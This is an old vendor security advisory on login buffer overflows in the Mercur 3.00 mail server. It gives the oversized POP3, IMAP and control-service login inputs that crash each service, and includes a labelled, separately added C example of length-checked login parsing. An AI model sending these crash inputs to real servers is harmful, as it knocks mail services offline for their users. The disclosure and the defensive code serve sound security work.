eEye - Digital Security Team Alert
Multiple Vulnerabilities in Mercur Mail Server
Systems Affected
Mercur v3.00
Release Date
February 21, 1999
Advisory Code
AD02211999
Description:
Mercur does not perform proper bounds checking in multiple places. Each of the following results
in a Denial of Service against the service in question.
The pop3 (110) service has an overflow in the login function.
+OK MERCUR POP3-Server (v3.00.24 Unregistered) for Windows NT ready at Sun,
21 Feb 1999 22:05:28 -0800
user touchmyspecialspot
+OK <touchmyspecialspot>
pass glob
Where glob is 2400 characters. It could work with fewer or more.
The imapd (143) service has an overflow in the login process as well.
OK MERCUR IMAP4-Server (v3.00.26 Unregistered) for Windows NT ready at
Sun, 21 Feb 1999 22:12:30 -0800
x login glob1 glob2
Where glob1 is 300 characters and glob2 is 400 characters. Once again, different lengths will work.
The Administrative Control service (32000) also has a login overflow.
MERCUR Control-Service (v3.00.21 Unregistered) for Windows NT ready at Sun,
21 Feb 1999 22:16:54 -0800
Username: blah
Password: glob
Where glob is 900 characters. Once again, the size may vary.
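For contrast with the missing bounds checks described above, here is an added example (not part of the eEye advisory and not Mercur code) of a login-argument parser that validates every length before it copies. The function name parse_login_arg and the limits MAX_LINE and MAX_ARG are assumptions chosen for illustration, and the input line is assumed to come from a reader that is itself bounded.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_LINE 255 /* assumed limit for one command line, CRLF included */
#define MAX_ARG   64 /* assumed limit for a user name or password */

enum parse_result { PARSE_OK, PARSE_TOO_LONG, PARSE_BAD_SYNTAX };

/* Extract the argument of "<verb> <arg>CRLF" into out (out_sz bytes).
 * Every length is checked before the copy, so an oversized line is
 * rejected outright instead of being written past the buffer. */
enum parse_result parse_login_arg(const char *line, size_t len,
                                  const char *verb, char *out, size_t out_sz)
{
    size_t vlen = strlen(verb), alen, i;

    if (out_sz == 0)
        return PARSE_BAD_SYNTAX;
    out[0] = '\0';
    if (len > MAX_LINE)                     /* whole line too long */
        return PARSE_TOO_LONG;
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                              /* strip line terminator */
    if (len <= vlen + 1 || line[vlen] != ' ')
        return PARSE_BAD_SYNTAX;
    for (i = 0; i < vlen; i++)              /* verbs are case-insensitive */
        if (tolower((unsigned char)line[i]) != tolower((unsigned char)verb[i]))
            return PARSE_BAD_SYNTAX;
    alen = len - vlen - 1;
    if (alen > MAX_ARG || alen >= out_sz)   /* argument too long */
        return PARSE_TOO_LONG;
    memcpy(out, line + vlen + 1, alen);
    out[alen] = '\0';
    return PARSE_OK;
}

int main(void)
{
    char pw[MAX_ARG + 1], big[2407];        /* constructed sample input */

    memset(big, 'A', sizeof big);
    memcpy(big, "pass ", 5);                /* "pass " + 2400 filler bytes + CRLF */
    memcpy(big + 2405, "\r\n", 2);
    printf("short: %d\n", parse_login_arg("pass secret\r\n", 13, "pass", pw, sizeof pw));
    printf("long:  %d\n", parse_login_arg(big, sizeof big, "pass", pw, sizeof pw));
    return 0;
}
```

A server using a check like this would answer PARSE_TOO_LONG with a protocol error and close or reset the session, rather than passing the argument on to the authentication code.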
Vendor Status
Vendor was contacted a week ago; waiting for a response :-(
Copyright (c) 1999 eEye Digital Security Team
Permission is hereby granted for the redistribution of this alert electronically. It is not to be
edited in any way without express consent of eEye. If you wish to reprint the whole or any part of
this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.
Disclaimer:
The information within this paper may change without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this information is at the user's own risk.
Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
http://www.eEye.com
Copyright © 1998-1999 eEye.com - All Rights Reserved. eEye is an www.eCompany.com Venture.